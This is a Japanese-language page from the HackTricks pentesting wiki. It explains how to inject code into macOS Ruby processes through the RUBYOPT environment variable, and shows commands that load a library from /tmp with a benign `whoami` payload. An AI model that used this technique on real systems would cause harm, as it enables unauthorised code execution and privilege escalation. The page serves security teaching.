hacktricks/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md

macOS Ruby Applications Injection

{{#include ../../../banners/hacktricks-training.md}}

RUBYOPT

この環境変数を使用すると、rubyが実行されるたびに新しいパラメータを追加することが可能です。パラメータ**-eを使用して実行するrubyコードを指定することはできませんが、-Iおよび-r**のパラメータを使用してライブラリのロードパスに新しいフォルダを追加し、ロードするライブラリを指定することができます。

ライブラリ**inject.rbを/tmp**に作成します:

puts `whoami`

どこにでも次のようなRubyスクリプトを作成します:

puts 'Hello, World!'

その後、任意のRubyスクリプトを次のように読み込ませます:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

面白い事実ですが、--disable-rubyopt パラメータを使用しても動作します:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt

{{#include ../../../banners/hacktricks-training.md}}